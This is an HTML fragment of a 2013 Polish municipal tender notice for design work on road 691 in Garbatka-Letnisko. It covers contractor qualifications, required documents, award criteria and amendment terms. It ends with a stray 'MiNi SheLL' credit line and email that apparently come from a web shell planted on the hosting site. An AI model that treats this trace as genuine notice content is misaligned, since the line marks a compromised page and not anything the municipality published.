- instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych - min. 1 osoba  posiadająca uprawnienia budowlane bez ograniczeń do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczeń i dokumentów wymienionych w rozdz. IX pkt 2  ppkt 2 i 3  siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający uzna, że Wykonawca spełnił niniejszy warunek jeżeli wykaże, że są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia i dokumentu wymienionego w  rozdz. IX  pkt 2 ppkt 5 siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu o którym mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie w którym określa się także osoby uprawnione do reprezentacji wykonawcy przed właściwym złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem - wystawione z odpowiednią datą wymaganą dla tych dokumentów.1) dowód wniesienia wadium - zgodnie z opisem w rozdz. X siwz. 2) pisemne zobowiązanie innych podmiotów, o których mowa w art. 26 ust. 2b Pzp, do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, w przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych, tych podmiotów. 3) pełnomocnictwo określające jego zakres w przypadku, gdy Wykonawcę reprezentuje pełnomocnik. Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza 4) pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców występujących wspólnie (w tym: konsorcja, spółki cywilne) w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy na  Opracowanie dokumentacji projektowej przebudowy drogi wojewódzkiej Nr 691 ul. Kochanowskiego w miejscowości Garbatka-Letnisko, na odcinkach:
1.	od km 11+147,82 do km 11+710,38
2.	od km 12+683 do km 13+322
stanowi załącznik nr 7 do SIWZ.
1.	Wykonawca, którego oferta została wybrana, podpisze umowę osobiście bądź upoważni do tego osobę uprawnioną do składania oświadczeń woli w jego imieniu. Skierowana osoba powinna posiadać dokument potwierdzający pełnomocnictwo.
2.	Zamawiający przewiduje możliwość zmiany umowy na zasadach przewidzianych w istotnych postanowieniach przyszłej umowy t.j., zmianie terminu wykonania umowy w przypadku gdy:
1)	zachodzi konieczność dostosowania postanowień umowy do zmian wynikających 
z nowelizacji powszechnie obowiązujących przepisów prawa z uwagi na brak możliwości realizacji umowy wedle pierwotnej jej treści lub z uwagi na rażącą stratę grożącą jednej            ze stron;
2)	zmianie uległy przepisy prawne powodujące konieczność modyfikacji opisu przedmiotu zamówienia i wynikającą stąd pracochłonność czynności;
3)	w przypadku wystąpienia nieprzewidzianych wcześniej okoliczności tj.; w trakcie realizacji przedmiotu umowy Zamawiający z przyczyn niezależnych musiał  dokonać zmian w uzgodnionych wcześniej rozwiązaniach projektowych, wykonanie dodatkowych badań geologicznych i innych, przedłużeniu uległy procedury administracyjne na etapie wydawania opinii, uzgodnień postanowień i decyzji administracyjnych, wystąpiła niezgodność pomiędzy częścią opisową a kartograficzną ewidencji gruntów w obszarze, którego dotyczy projektowana inwestycja, wystąpiły zamówienia dodatkowe niezbędne do prawidłowego wykonania zamówienia podstawowego których wykonanie stało się konieczne na skutek sytuacji niemożliwej do przewidzenia wcześniej, które mają  wpływ na termin realizacji zamówienia oraz na zmianę wynagrodzenia.

3. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej            z okoliczności wymienionych powyżej, z uwzględnieniem podawanych warunków ich wprowadzenia.

4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które może Zamawiający wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Wszystkie zmiany wprowadzone do niniejszej umowy dokonywane będą z poszanowaniem obowiązków wynikających z  obowiązującego prawa, w tym w szczególności art.140 ust.3 Prawa zamówień publicznych oraz zasad ogólnych rządzących tą ustawą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.garbatkaletnisko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Garbatka-Letnisko ul. Skrzyńskich 1, 26-930 Garbatka-Letnisko pok. nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2013 godzina 10:00, miejsce: Urząd Gminy Garbatka-Letnisko ul. Skrzyńskich 1, 26-930 Garbatka-Letnisko - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com